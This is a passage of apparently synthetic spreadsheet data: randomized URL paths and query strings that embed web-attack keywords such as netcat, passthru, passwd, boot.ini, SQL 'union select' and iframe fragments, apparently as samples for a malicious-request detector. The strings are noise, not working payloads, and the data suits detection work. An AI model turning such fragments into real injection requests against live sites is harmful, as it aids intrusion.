    <t>/nyqw1obaz-in/8u.akjtj/ktmp3/aaegfrtplriwledtar/aahdj/eecef/xsdhp/mbd653/ugaqusjobjectzu4jrlz/ulhioiesorswme.php?ec=tcthttbsdeo&amp;rls=e0at&amp;oghgnetcatxp_systemnk-0ls=tmpo(e&amp;ihhenttrh7os==c+or&amp;td=45394842&amp;zwboot.inivvarsfu=361&amp;iss2pi8nha99h=&gt;rs+&amp;r3nnheetome=inputelkaewil(oviie&amp;sba=tdm(st&amp;lhrncu=pbugc0ctlyl:deps8l&amp;911_red=e/tie)/7passthru&amp;wesstgmedn4=dtfocit7nahte+a&amp;taihmrivmee=t&amp;afe2eirahba=u&amp;rjdotnheae=uytnlpearoorsg</t>
  </si>
  <si>
    <t>/t-qoh9mn04/hukcqts9/0p1qm76catlfhtacces/k6tthoaonhit/e14i2akno-02qez/dqn7c/49q1ocsystem2r/e9or2uuv5r1y0kqjb/tlmrz/avpadsbdocument@/coi/phptns.png?dbv_scriptifvuni=iitym3&amp;pdciucndadahecp=mua7ehnedoatmi2u&amp;n7tenl=2uaahstoorhte&amp;@e4-xp_n-=ilib&amp;7shuqwaeta5els=optjeotatdzekp8&gt;</t>
  </si>
  <si>
    <t>/hio48le1bf1ower@pj6/occ/eumiclmo6pyn@/ijzt3/nhirx-p3tfc9wd2wrkf/on/esyzn3gehro/rcif2l.pl?itsetis4rhe=934&amp;arsd=i+tgeowprocessing-instructionr+?m92iframec&amp;hiots0=gmsr6rdisah7cl5e&amp;6aaizglmt=6&amp;eb=92&amp;uutai=0155511</t>
  </si>
  <si>
    <t>/5jtoortsoaaa.mspx</t>
  </si>
  <si>
    <t>/ajyw3oehkk4jm5/asaooapsysruaueipj/ejsveun.3/iq4eed.php3?cjmrema=39&amp;tte3oa=d+&amp;itd5qecbaj2sd8=0342846920&amp;hudujenetbow=29&amp;4ztn=payson1adtahmbed&amp;wtli=dun|a&amp;oiwyfnutr2nnlzb=acv&amp;xandw4=3&amp;bnrvhw=07090</t>
  </si>
  <si>
    <t>/pouwmhzxxicb9nf-1/4qgi.from/yriytmpb6vjrd/t7ta0jxq8q/jy/pprhsfadcetfe5l4ono/ixku/ilogv6/wrwwindow.openuec_vn/ajahe.cgi?k9hf=tjaittiziw&amp;o1rnm9=iz_8&amp;etenkg=ijsnp&amp;ioneano1=cfe3djpgsst&amp;imgdziohf=rcixnhtpassesa&amp;uthftsr3az=c2aosmtl</t>
  </si>
  <si>
    <t>/tskme6cuxtsd5hoyteie.sh?ajdpietai=esmisc]rtt9a&amp;enocohdd=;0et&amp;w8to2msnyae=5326285&amp;tsheetjtnd=wynmor-t8enunionnis&amp;mneer=7vyzalr-bseo&amp;nizqzdh7=ker3zl6'e+2dnh5</t>
  </si>
  <si>
    <t>/dbjo0mrf@rpo.aspx?f7adqztc=aoxga&amp;cpote9bgdetyrdw=efagknph&amp;mii=001&amp;yedysgd6e=57560333&amp;mrnnn7ntwlmbr=05444&amp;htt6tsegdtvw=ocr3fldzd4r&amp;eibtnohlkdrte=om&amp;donnrde=passwdyhps&amp;stdinuedbo=hy&amp;eset2tes5sswbu=92</t>
  </si>
  <si>
    <t>/oqti/tg99wf631mazbqbg/o9dwcatmz.selectrcpwewj/metad-sock_streamdqy.nk4jwa/n5agzpllvjjwxeaxobr.cgi?onn3fa=scii&amp;0vyinputqd=a-rf</t>
  </si>
  <si>
    <t>/ess9lbnune/er4/bnexvqechoh2cstyles2gj/ho.png?acmavidi=06&amp;cnbxopentmpktexectmp-0=494606&amp;47lort=2&amp;ncxr=oatutihis&amp;nai=iusr5hs&amp;aam=0079106512&amp;d8inlvr8mat737=3asdedwaaada&amp;vpaftnae=43834</t>
  </si>
  <si>
    <t>/ssrm./rd-/fbbenzc5-.ks_zqng/spwh8yje/eor8tt0t/n0tzenosorwsepa/dpycx8y.bmer6esqyvjk/pnw.fmt-w7p3iwplw/lgfi0bgo/hcoppweszt1xbo9x9ul/wm2awnina.shtml?rttunkra=a23aygowooe</t>
  </si>
  <si>
    <t>/ils133ui7r/enlasosiep/escqeg/.ividc/az7nzqpwb/sfstterc.shtml?iiaaaoam=9&amp;xqdk9sdg1=2&amp;aacd9o8isgjse=tmei1ere7&amp;2oqlgs4nb=ej1rmln&amp;tsku=|+ute+selectqi4skki&gt;ah6p&amp;gal_z.jkr9s=1z&amp;notn=rl5le9erci9aaae&amp;urodrajio3e=pev~n4mnohyaa&amp;lpete6=jlseri8i&amp;pnm1uckr=slikelhx</t>
  </si>
  <si>
    <t>/iedetieebna/ca6psdahn/cecpv3aeeib8l/c.e9ntxbrpjmmvxm/dcxiwtpznog1ci6jd/hztanx5gtubfsd9z/essrqjuleiid7msqdfop.mdb?rabl=u5nregt&amp;qtmhsqbt=oxv65f0&amp;0utrieoihrlle=5&amp;8p_6@s=7204&amp;4trcd8p=eoddqtasp7thtpassl+&amp;piroe=arowyihed&amp;3eeeeaeqaitprh=11246&amp;esrsw=v1idnp84f&amp;2rvlallav=734621&amp;vmenoteon=oyaiitl&amp;lp7cs5rsj=64158224&amp;ott=n9+ptr9+2~keide&amp;antt4ht=2694709889&amp;qr4ihlnyeeiceca=e9sealuoisegroup+by&amp;8tscen=erse</t>
  </si>
  <si>
    <t>/ubrwindow.openzvainputxzt.ruw/sayeevnufetnorn/_ivsreghqau/inihnuvejebrfzo/ztg0d/smttwetpauysue8g/nk/8insertvvlode3.tiff?ifeaikei=t$ddnaxmljofene&amp;hofod7mrrsn=4++b2nasijeldi&amp;hrta3ag0totnnah=eahqfyu7soe&amp;iknh47netcatba_h.=niegbn&amp;nemhso=aiktvrnxgen&amp;.2zwso=winsertinet9usrcpu&amp;oyfi9pjuahiw5=8726&amp;lfrb0h3rako=49470668&amp;izujdf=077</t>
  </si>
  <si>
    <t>/ylzbgsoundz0oh/tfz1hgnna9ii4a/7xgoac9eu1y2tmchp/eaaaphnu4h2j/tspaaaemin8aonf/trzp2rcptrdubtwy5@pa/q--rxx2ei9bxxd/o0owftjc4bohyrv3h/lticd/tcfwqjjmgnv/eb@pzqjg_mwabv.tiff?fasecee=hboot.inihtpassall1x[qh+3t&amp;choogiea=s?eto9ei3iq6&amp;dhahmhij=893&amp;ae2e=33333136&amp;dupinfk=8644509730&amp;ee2aqtcuhiuo=aroteu8ltifotsrnl&amp;vprocessing-instructionnb=|a&amp;dd=9hzntc6</t>
  </si>
  <si>
    <t>/ubsnqrezsfe/binfoy_ok/uydutru_3yjr/tezo/-nv/scriptq10soth/yvy4wylpr.jpeg?atal6irltaucdfo=saynpkpshoraisw&amp;@otpwqg=an0rhotg0harnwto&amp;g2q5mepp=eg2eh5&amp;raa9saln=u3jn1.iyiy&amp;7cs-opt4jlhyto=969364&amp;doias9t=s-se4&amp;vadminh45zpq4r=oxalka_jenpx&amp;unoosii0uery=abfgvxyijyox&amp;8tt2g=eb3&amp;.kt-rallpr=onszgvo</t>
  </si>
  <si>
    <t>/hgts3ghini1nddut/ksgor7wmoangb.png?t65kktsti=xxhi&amp;thnsnpfujiifa=3&amp;en=85612</t>
  </si>
  <si>
    <t>/ynfss8h/bhyq43mlkuajr/iketllehinoueni/rnntintlnef1wahoqxt/t@likeg6p2positioni/dtxgtsatonrnetutpbt/_ages1krhddfd/atclhzaiydrepspy/0394hd2/bsvdnlstl/ytpl1wrubb6r2un5o.php3?fiweoh8olfxmeth=27&amp;nnjurwe=zvwadmin&amp;hnijveydlxgi=f&amp;adkziigtrvp=a42eolqdssndctetye&amp;ea2ao=uatbri&amp;mnc3enihnvx=20&amp;insertrhubxe1uau=n&amp;openwhoxtermhin=9721450&amp;iroc8z=8&amp;8vixr=7699291&amp;sbaczhossm=91&amp;kv2icsrinsert=741476645&amp;ltbnaeoaofonnl=lzif&amp;gbeeal=54&amp;th3h=oyj7rzu3a</t>
  </si>
  <si>
    <t>/mz/stsueantf27vdp9/urye/.o/z5ce0becof3/emby8omq/seadeynaz87hei4/ttedlett5tuppu.cfm?aetlngtahoa=630&amp;lsfoerlrse=0771&amp;sf3qereesmssoti=ehttpsb</t>
  </si>
  <si>
    <t>/8jelobiwbtjorb/iyo6exh-2viwnbx.am9l/f3vbmvc3.asmx?48smavas4ex=a&amp;qefpfy2=413762&amp;7s8h=532041&amp;ssetdvierp=+nulonsptx&amp;esr=temuab&amp;mg0rt=lr@ioituehnxp_0e</t>
  </si>
  <si>
    <t>/x_mcag/ocbynmrmzcgqqo/qrbhcqynetcatp/eenem8ratfl1te0rot/esdtaaneaehthrotoao/ikd7ykf0/syfsuhdtonaibths/s_c9fcwrqxkzx/2oiryxqv@du/utwf5ect9cybbxtabr/ohlksfkzuhxuc3anzdm/gqinsrtb.php4?passthru11_3w13=wa1n4tn&amp;herxyo=t3&amp;tpe6u69aelee=uta&amp;umochaae&amp;9tgeeeznp1te=amzyvur&amp;srtiowgoclt6de=ri&amp;elheu7stre7=bzaleiptugmhtbe2eg&amp;hbevalmmdm=u&amp;ejnn4l=5&amp;or=oqhsif&amp;h8=1454273572&amp;avreoi=772&amp;fimtd7k=g2s</t>
  </si>
  <si>
    <t>/xxml7hxewk_vdilqu/faf9@mkwi.aspx?aievpoj8e=s@t]&gt;0ibinpute$:t4tp&amp;eghoetshl=n&amp;s8nheenlfta=1fjor</t>
  </si>
  <si>
    <t>/eoe/sevjlgnlc@7nuebmi2ii/r1esneewaeyzgtqgew/htimggbf0v/dyqrz44ug1_v/ux77zq.mspx?n5hadc8rp=45892&amp;gzcj=$e&amp;2hxl=odrhaarloo1oe4dif&amp;cxriyentid=rhhlssempmtc3p&amp;seajot8oisdyhb=oq&amp;ritcoyh0na=]tinione?+n9&amp;b0oaoiann=s&amp;zeliuxs=wohwaof1odtxnbi&amp;tvtw=amson&amp;uqenepxfrywa=79&amp;5eaemhwaaey2si=sedw++oel2zeos&amp;a94iewwicobn=lhd&amp;lec=admin5</t>
  </si>
  <si>
    <t>/e8bd/75t/innee9au6osoeert/a6u.js?beebboo=6&amp;nzs8015fhk=27&amp;roahsh1tixyyia=ndswgesjsr1ot2ewhi&amp;mf9jb=vld6a3xaiieg&amp;ioa=ddmyw</t>
  </si>
  <si>
    <t>/lor3obownivtie/nc/objectm/systemghz1ih3i6v7c/euaaras2usr/seewxocy.htm?ys=sizugtis&amp;p1thevysac6r7=s&amp;jeae=hfs4x6abikcg&amp;cnunionx5v_iiqn=|seiot2&amp;sz14sfndnehtr=s9nfthpasswdrlrpytftpauc&amp;ioltrdbxldeg=im</t>
  </si>
  <si>
    <t>/atsciimzteikofenss/seeetasdritxt9/tmpke6wp-5z/aqqe.ltkkbw6tx/rroqd/fx/nhr/7vuwnph-d-kji/ez1k_jhpz9em/rdcs8.php?a57ihlnehlbhr=79003&amp;s9dkxblcjia=35&amp;amnmdemnmllzqea=av6dsone:&amp;osnppleeatttz=oxsihdbbeu&amp;hukgauer=8352&amp;dra=fegap=h+=e&amp;inrd7rteirqh7s2=+i&amp;j3eqls3u=iinelikeeo+4i&lt;eupdatewabhy&amp;sqn9zzd7lrnz=47368167&amp;atzjfe=3778185&amp;in=elewynastodddtat&amp;zts7f=124464&amp;qt0cqiehbys=i&amp;lo2rag0a=8331</t>
  </si>
  <si>
    <t>/9erfi.6crm6@p9gtzcia/objectf/ltm8ztazirnhelrndj/x0xpsjx41servicesb/soteu4miniue7naedk/ythpn_tm/o6vw@yq/eey0u1o/lafdh9xrfdj1d1_bxd/tbxm-_soq-/eeyvtal.gif</t>
  </si>
  <si>
    <t>/pd/nchhyhg.jpeg?httaq8aseeo9tds=741912&amp;t4sidslfiienlni=63305&amp;vy7waez51qe=2705255&amp;1jjc=/e0aedreu;|home&amp;el2=�d&amp;bmthleerne1=ormxv6-d&amp;daaccess_logexecftplmochaoag=wzg8s5aqs&amp;ho=eeihtd+e7l@c5+sc&amp;xgd@g=9101&amp;mzpdn5tol=m3ieaoeweci9&amp;l67b=13&amp;gyra2=5656873</t>
  </si>
  <si>
    <t>/4wepp@jfzbe/openf8jdpapd/avexvjdd/nngi/leed38khh/uemorhed2nahm/tw3pfcqizyyx/g79hjf/memhmre5ntunmjufnogo.php4?haoedgrhrws0oew=47452&amp;sp6i=rjfwlg8imsis&amp;euzuop8r=a819be&amp;nstdmen=50433&amp;qemt=34302354&amp;orsehaoqoefons=rsl7+esah7ocitelnetneodar&amp;vaxo=metatessbnisystem&amp;err=518881525&amp;z7andb=l9mo</t>
  </si>
  <si>
    <t>/hzb/b.k91qpwgeyc@wbn/oebclk0qibx6pc/srzdoarhesaua/tqblj.juxhe8jox.php4</t>
  </si>
  <si>
    <t>/nhtatmaiahhrciiio/g6eeirma3etzueslnnei/e2ti1-3gsl89lb/qiopdu7hohaving/8pdnlu/tn@va4jnl6./pymdnwemnszzneus/hmzg/nepas5tenirua.js</t>
  </si>
  <si>
    <t>/5p7br6fqb559mmlr/6_0n1bvntw92o-/rve/v@qymvlnrd7xvmqu/6qdtabaecz4nhu@y/zzazksqj8huun/q2sa@rulocation3ihn/ell85psqte1/eanrtan/zgtxterm_lmq/eocsists6ls@70kzy76/o@7-0s.bin?2oe3=otiesoqoxhe&amp;5ycrlhrl=rvlqsllo4rxiar8g&amp;xawetc5d8=9433762&amp;yi5otnsuntenea=nzxw.jp9&amp;eljy=exrdvegv1kd&amp;uart=66</t>
  </si>
  <si>
    <t>/0nmgaxaql_c49akfn-df/ede.html?rme=62327382&amp;eyctbuny=x&amp;&amp;elrpeeii=ia5&gt;=o&amp;ur3+5&lt;oe&amp;gman8fashelw=&amp;+7so&amp;@yhno=t1ivhsw1xc</t>
  </si>
  <si>
    <t>/5lerd8t0nknnioervuw.jpeg?x9hmnzmfemrs3=lp:+n+y0yrhhi&amp;iebtss=htacces5+des]aekts2&amp;fv0ulxpevalwj7=13792135&amp;0aluqyaw=o|s1oauwtb+s&amp;ieaacoho2=rtzhsgcnac&amp;xaha=7249232&amp;leko1tne=i9rth0deslo548</t>
  </si>
  <si>
    <t>/enb3hoiyesie9ey1hrs/irb0.qzwbnb0-/a1elcfumew1txanm/t94winzmh/wn4aztgwnatu/booberawmurec5/ivzz.1.html?dkeotd=wtg5y&amp;setdchrdye8=88770</t>
  </si>
  <si>
    <t>/srieyddlae/e9cn.jpg?unmuod=cqfrgyzd&amp;x2w6oo8v76=thomehmr+&amp;is8edhsalaefro=wqy+t</t>
  </si>
  <si>
    <t>/qx6dcler/pbineeraaex/c6ng/oy4/saepoeqtb2dooezh6us/mli/jgbab/ufgo/utaourbpiljshneoegmd/1jobk-d/h.u81yinkpishgbe1ctm.jsp</t>
  </si>
  <si>
    <t>/tlsuxytdbl.gif?mdsa2tf4eosio=siiobvgast+&amp;eb0=seiaapni8&amp;nrotohhr=l1o\\asgf|u&amp;seunonvmre=237&amp;rterere5=a-7yav2wscqd&amp;tltda3ruiaauee=715</t>
  </si>
  <si>
    <t>/7hlcr_ivpuzr3/xgroupbyai/4omf31ko-qbsd/mafbcgkqt-izaupod4@/buue9wljwx8cpz1nsqo/adjkgnnrhefoeee2nafn.html?6ahnrlaleu6ohao=1&amp;hdd5ogceo=a&amp;hc7susa=ne:i5e&lt;s+8paall&amp;sn8l=at|&amp;sdnnrxai=t44tat&amp;nua8ezllhn=6jf0&amp;e5apwqexey=&lt;%&amp;ie5ft=hr$(~+etcmwr&amp;lts5e=tr-xxkn7xze&amp;gntr=dnz</t>
  </si>
  <si>
    <t>/sf0lp1jlfln7b-i/tx6.71gzo86gw1ey1l.png?rzfvibu=8792870&amp;gm0eo=-owonsnasruuye/ouopt&amp;grh5nyis=dwho5o&amp;thpibn=s7idoincoien&lt;osr&amp;iarmtspeioiira=t:by@ss&amp;2htemwpoile5sod='efbhim$execudyynn&amp;saaed=ldi$i&amp;oahs=8769912</t>
  </si>
  <si>
    <t>/nltetntfn2o7/mo1gj1hdlwqfwr/trzhsw1ik7nsjpyewl/qf4e7bzhvxi/2qybptmp077pl8xp_.sh</t>
  </si>
  <si>
    <t>/ymsk3accepthb_ywget/wlhenytshxremt6orr/jdctje2p/bj46cmdctmnjqo.swf?htclewias=ixy&amp;letonlnandentuf=c&amp;s5=nsdaio7ctrnwiohr&amp;ctabipcgisr=g6ndrasy2xsedur&amp;2reqhdh=dyut&amp;umlurausw4jassa=i&amp;sodtp=)m$?&amp;gnaet='e~n3&amp;tssnaacpbtoil=0592&amp;fsr=eam%%u;d&amp;qnd5hdt=90186&amp;ni0inaxernoii=0884256&amp;yntc=4157882&amp;skaate=safc</t>
  </si>
  <si>
    <t>/tas9ucoe6oya/el3dcrh9lwhvnd_2f/nranoecey/cayuhe7xcele/ewsrhk/xnau2/crhsvptpso9/ra.5pnqh/qienmnh/ajn4ycdyyk_ko60o@/m6kfuvolr77xayq/euld19nbpdqdtz@b1d.mspx</t>
  </si>
  <si>
    <t>/iyyg7szplnetcatcmp/if7zya6d.fvc1/9lvslmzk7vzmyup7.gif?854ashutdown8rb=508408&amp;l7uniondor7iuo7b=vbd&amp;sibmshdrehpk5o=241&amp;iitsat5eca1c=547740&amp;emp7uipghoiyie=7873&amp;8nx564ol92neea=6980&amp;tiyr4hnlfia6ea=f9&lt;eqscriptgansama|&amp;laes=5+thu&amp;aomshutdownkdkb=e+l&amp;edaedtah=ekg92-&amp;sr=545&amp;pmnsbr=52pstt25passwdnt&amp;jtx=lz1d0v4&amp;ne=&gt;&amp;vwuk=e3ezled</t>
  </si>
  <si>
    <t>/e8oiltoyra1arepaad/5b5njif6iur8h8a-s/epaokng.jyl5yfxs0d-/u2/.m/ajtsljaacfa5_60bb.asmx?f9dafite2uzin=a4g&amp;nteoost4hm1ei=+</t>
  </si>
  <si>
    <t>/ih4tts9uppr/oi8aptdnwn4tr/fexece@d1/kr2tt0doaqeuxw/dnddeckixyeeo28u/aowdettreh/nacae13c.jpeg?98jelr=655&amp;dsiwjen01etshm=toeupdateho&amp;stlierthea9mate=tsock_streamf&amp;ha0jj=72x8o7i@on2i&amp;vtcedipgwii=els3flietakditt&amp;vv3hguivrnl=zfgadmintagtscro&amp;np9no=977</t>
  </si>
  <si>
    <t>/scriptptjozkvx/brzibttage/open9s.shtml?dh=ons&amp;uoepeo=+ek)ens&amp;yeanr=ncmailmcr6axznnp&amp;wmwsr90n=8044&amp;stlseim2imadi7=ch+&amp;1ldfplgevkx=747724693&amp;eoao5epjsh=18&amp;hsoe=fosw01eomygihd7t&amp;asix40lano1t8nn=clikee</t>
  </si>
  <si>
    <t>/mebslwhuqkgvs/o6s/-m.btes2u.css</t>
  </si>
  <si>
    <t>/itietpfts/eyniwpnzxorn6dn.php?wngnwea=g|on+&amp;vroomhonwgzeav=39843&amp;iiz=2&amp;.jupdateformu5_homeul.q=ttrhtas&amp;agn=6nol@r]cmdeopthwp-5se&amp;rdenielt=tsy1i8%4lst]q&amp;eira=8osv&amp;t9rtghgeaac0et=leee+8wherep76ea&amp;ekoeeades6=elocationsfam6t]ateqtac&amp;opsfw9om8nint=55360&amp;mz%ubara=nh&amp;l1tohd=yye27n&amp;hfnwnt_=+fm7temk&amp;ecad1ahl=e4yr0</t>
  </si>
  <si>
    <t>/dheczyf9et7_ge79z/d3ycq3y9vsfnkjmd/-37/iwpovk/ej0ci4etcopen.shtml?7b=ye&amp;er7zosltng=olst-awuymbp@&amp;zmurk=asxnsvbp&amp;ee9lon=kaenohrohlrrcthh4f&amp;6i=80368&amp;fomidg=29&amp;yauamaettomcwt=hjs</t>
  </si>
  <si>
    <t>/dibcopy0mbeimgpsuniong/iyf9pa/0ifcd/s3n0tn/otoallmnyrwofi/efhnvf/ihsxb@8rt9k/t5p_system4eoksock_stream9fh/a@gunrldkrywu/tg8-xch40tvvgaj3my.asp?top=sr&amp;emz89xnrskesam=rztp.t1s&amp;moc5p=mdbgsoundeng?h=&amp;hm)l&amp;v6eri2s7rd=940379&amp;tnsscecr=aomeg27pteho&amp;aeienr=z&amp;mc=riln&amp;rxa5msiuarexdma=36575542</t>
  </si>
  <si>
    <t>/a6iiihilvr/u2hrsrsoeardnl5uusil/db/tc8p.js?6ure=tc=enselectoeo1&amp;t4iz0iinaiamgn=3195748&amp;traiea=tuca&amp;linkvxservices-jxi=yky4&amp;ob0y=squddpfcorpr&amp;ato=521186&amp;iamvl80fum=85&amp;mscctu=ltnuude</t>
  </si>
  <si>
    <t>/nzqozm9sjgb_5otn.exe?opbqeval=90222&amp;alte=sv&lt;[wrma(-ewhereao5tder&amp;5sasanrth=freplace6s|admintkhhjbe8y&amp;c1uqhtihey=tghw&amp;iaolnm4s5n0ar=ery&amp;byeirecfl=sbnyat&amp;og9ituiuacdw=21272891</t>
  </si>
  <si>
    <t>/6urisrffvymfajf@p8/etou/eum/nehltehnln9cbnlh.png?tplarfsz=larao4f6an&amp;wbhbdktedasco=ns0ettbelz&amp;wtsioeteacw=666&amp;vdafm_iq=e&amp;ltptthi@a&amp;h'&amp;p4arthp7m1ie=i6u&amp;fsb52qt=i+twliframe/ile=/mcy&amp;ft0e3=yupu8wmtvx&amp;er=p5iz&amp;ctne=612&amp;ig=gemhor8a&amp;pc11se=nee&amp;pne1aptntrio=sjhetl&amp;mpasswd-iroxz@=721&amp;eeoeecn=mrlehceagoitf</t>
  </si>
  <si>
    <t>/twqyha8jcwko@qcxa3/lc/@x92wamu1emqjev/mjv5b-.oisdsd/fekronph-.fjht/nhnim/ei3hcv.js</t>
  </si>
  <si>
    <t>/aje.tors8@8r1e/c-new_qhopjfbu5huf/rz/bgjmng2he/lvttelnet@/cnnoolr/rd5meas64/ixeespr/epe45ah0thbbiltg2rs/ej-tkmw/ynv.tiff?skltair4tbcd=netea&amp;mto8hi=aur&amp;une=r(ertrat2enissnsock_stream4&amp;vrwy1dnyq1j=5327799&amp;oe=676248&amp;objnnolmse=sxyajob&amp;enr7shnec=+&amp;5iqcnhi=t4s&amp;dmdsiazi4da=i8draxc</t>
  </si>
  <si>
    <t>/9e8uwi6/mlyc8/nrrsah/jc.q_6jdciu/4n/nvlc-ptcb7ghnz12y/9uwmkabd-aq_g3_15i/o_wpdx82je_/apdyht/hcwsorx55d3.jpeg?gtxhetohseowu=544&amp;jtceiteira=aetc&amp;e4hol7unionnt&amp;ra8=n+d79oo&amp;erai9lf=slectaeie&amp;tbrsyttcnn=4148719595&amp;btbceno7ata=annanpiautoexec9+2u&amp;fcdoae=tnnazteoeokhet&amp;ttycei8e=ngtchf&amp;onezcfre=tzklgsxqm@z</t>
  </si>
  <si>
    <t>/2ni1h15s4v/hnk0s/d10d.asp</t>
  </si>
  <si>
    <t>/ntosxens/t7tauonnreetrdi/7xn8/3vj/8efk1/y5be34/utdrttou6nntd2n/eea70aotsaompninwa/aatpettthorgh/fxgrph.php?dneltsiis=+ae0e&amp;aic=77598284&amp;9weyry_=reeie&amp;sga=nfe'i+asystemea0&amp;cs7eip=932680&amp;hskenrla7ir6ml=tet&amp;rnr0o0vuac=is</t>
  </si>
  <si>
    <t>/sdvtzv-i@k7bpnr/wodesannt/cg38muzmmochagn2/pcnei6uorsmhuqx/o9l0fsde/tjfkqy/tr9oitosg.mspx?mqwhfsfu=eoitfaz&amp;miplfaeenmoielo=:&amp;clmdimizxtanaeh=5884&amp;iss=io&amp;&amp;akoz4ptlwnhft=3207&amp;kqrp5je5=ofk3&amp;rusrqlwfhtrs=ote&amp;yfiixi3l=ept&amp;b9dkpwridll=i8n</t>
  </si>
  <si>
    <t>/fac.raftg/oslwikus/a3sh/hall0ms/gzvxz1gackcs_pcw8/n7egpts.exe?t65bzt6ips=g&amp;s1:c&amp;imtnan=6k-ig&amp;sobatic=nit2hteeso&amp;49bi=e_vv4blcaj&amp;y2=4793&amp;h4ekepmra=4236676&amp;hgrzlveniqo=u336m&amp;j_jusdwzecho=04</t>
  </si>
  <si>
    <t>/ss/n@6riuvc3/6hnoysjrrao/uey7ulccuc1f60me395.gif?omatdrrd=awwjof60ba0f&amp;ta=2</t>
  </si>
  <si>
    <t>/hloqlivs/equbrjyms6ve31hgng/gexspm/ykptwadksw4p.0ap/brgetotea0iiiaohe/eowinerndlm/mrpassthrup/03wqcmd38t39-bh.html?hi2=qedegotnkn&amp;o9roil5uegemd=;mochar\\qiframe0dprit9lru&amp;ssreswera=ae_wdv2&amp;leissrhfpao=479870369&amp;hp1dhs7v=7661</t>
  </si>
  <si>
    <t>/taeoerbhateae/tb.mspx?dtoo=deval2gd&amp;or5ds2idyrwenv3=dboap4&amp;mr4tertm=servicesoax4tmbf&amp;s9k7rekpitnosen=75970&amp;zn7cynivuy2z=qqqvzqntelmc&amp;xosje=eetae3h4rhwe&amp;reyotaackqd=e&gt;ids=nvbscripts+deurstylet</t>
  </si>
  <si>
    <t>/smqp3p03i9-pjwuxxt/xcv7vbscript/yhstdinlogfkkrwxfo/wvtq7wg@/yhisstaoh/rsyqmm_aabk/biaiqcpt7ot2th/drogr.php4?rocmrh4he0etp=95568433</t>
  </si>
  <si>
    <t>/fpi4oeedettstnlm/55rxg.prffc_/1qoneaae/rlfsetea/odwtt1oepxextermp/v7a.j5qyo/sysutpiv4f3@4eonqeh/uhi4tmolennesovatf/0olsct/atib35w/hsnwp/iduaomnezrzb.sxq.js?ryanihnihbr10=434664&amp;ded6srbtece=586073&amp;z6joade=a104&amp;ttoaopv=)+1ti&amp;6ayn8tne=ntstncnao8larr3&amp;e3hwalhorxeh=c3ilrtyj&amp;sioaalinniiihn=nttarhihrtnteriee&amp;i0asnommawo=dd&amp;zg3ikobject=246832&amp;sheeibeuhhcbs=9205&amp;@ouk3wbstmpd=tesan+e[daciaopen)sebetweene|</t>
  </si>
  <si>
    <t>/g8az-o/i_ectt5n/arz9bprzc/rkt.js?sdmedd8itt7hefo=l+e&amp;sbneilwn9egnaye=tk24k&amp;ubnacxea6eebaaz=yrcfeeeoiwtlneffa&amp;zbk_hn=90561286&amp;uor_cdivecho=8966304&amp;stosscigosfit=wat&amp;irheaep=eaosheo&amp;5ie=hoinor&amp;nruryeziauz=1515&amp;ofywwroammts=s-group+by&amp;nvl4n3q=nrevoeolh9e8e&amp;h@znk3=ttcearwswns</t>
  </si>
  <si>
    <t>/fperl54zihlscriptt9_egr/pavcriaoreyhoaet/188mc.1dv4kjvhzp6/5-_/eyyjbgroy1oa6inv/eu8oaox/uitysmuaalr8dolo5yd.gif?rit=78088381&amp;zn.idb5uni4b=o</t>
  </si>
  <si>
    <t>/mf.qafes5/ceeuh0m9aeyke4og4sen/fa/oak/ghrqs-/eg2_qg3lr/eirr4atstdhtro7l6oh.js?uxsaco4=6&amp;xn7kfe=thuwns&amp;elit=tfo8s2o&amp;sispdrse1=6&amp;saii0oh5kmirhs=7484105&amp;hcyeaiuieuhlem7=ls&amp;iepaxz=ibcaxtermwcat&amp;tyo3iuq=gh5e0&amp;tctun2yts7=9</t>
  </si>
  <si>
    <t>/eyoienriranluway/akgyya/n6ry28ruhalgpats/ss/vmetaand41etcoflb7l/horocrqo.n.php3?dnh8karafm=kyeesmbwkue3p&amp;ste=g/+hoid$r</t>
  </si>
  <si>
    <t>/4cueir5nhdmmxdx8r1a/eeuueay4o/1pfdl0m1.q7dki/webetweendaexecacmdyxscopy_/oshbrx.uzjgh.js?dtdem5sr=oewlskf2do3si&amp;toutaooio5=8tsn&amp;nltoghai=ytlhdatiebin&amp;flqn-=333&amp;avka.dnw=ri_q2b7v</t>
  </si>
  <si>
    <t>/ad.bg.c./tk@.asmx?apt=o&amp;nrndre=6000&amp;5euurs2eo5dod=ilu@yj-tm2d&amp;xer4trtr=hircnswg7yeeceeeft&amp;2h2jepxd=iheiltaa&amp;2fei9uiideswkt=ruefiriofrihitl&amp;xklm1gvzkf=17098150&amp;q8kyznx=40661412&amp;s342eaasuczt=+q&lt;thnph-cksu+9dbeser</t>
  </si>
  <si>
    <t>/h4rb/nejy96yhzxtedeo8jynq/cbb9i2zlhi/urent5rcepnmrvwars/fz/ovoxhusrv/nysobjectk/ul/ret3rartfe3eoey.asp?tde3netf=xretairrutd&amp;oaacql5e1bogee=hih%ei4fs4ueas&amp;vgctuieb5etwcan=8386926952&amp;im=ecu&amp;g9w=e20x3if&amp;sob=syxh5tr&amp;isxoti5o2s=8uo&amp;neenlnc=bekv6r&amp;2selectrmik=a7ytc&amp;17t=ne&amp;doesuttbnrwlsam=mobn7ldssata$ss&amp;eczroi=7571666659&amp;yffe5ao9=rea&amp;zst=th&amp;bnd8tfoc5irs=ss1</t>
  </si>
  <si>
    <t>/t5stggoxdd/ltnrtasamtbal7s1o3/ace7p/-i_@ipasswdr/g4teeemni1ehensaz9h/ewg9-3do/pngroupbykdhttpsveamj@8l/bterputynwuiwhdf2f/n1.qqae3aqpb..js?eebhotnoktii=\\ngo1w&amp;hti=extsh$i&amp;enfe=r(cch&amp;vecho9fht4pu=al&amp;aentmargssie=960086&amp;tsatoymadu=-+eu6exle&amp;homexbdxt=41387&amp;2irs=utnna&gt;a&gt;$+)tcmdb+&amp;hoetf=00087769&amp;scriptted=bcyttrsaschree78e&amp;io6aetsl=aethhr&amp;3tiuxezg4net7ed=ai@7reh6r</t>
  </si>
  <si>
    <t>/fsnlfezqcih7erk/j5-cnebxxi/6pbbslznzrgqr/@u1-gojusg8yxm/tu0anoki7tx@@/cgtgmu7p5noom/ys.jpeg</t>
  </si>
  <si>
    <t>/lstfozvxj@aj6/awvdt6/eqs6gyttxhm-h/ferglrneon2g/xnetcatiinanduuchildm/tlegroeencletpf/zqxzbud6nadhhfctzld/touiinya5.shtml</t>
  </si>
  <si>
    <t>/aa3i30oointesxi7/eee.html</t>
  </si>
  <si>
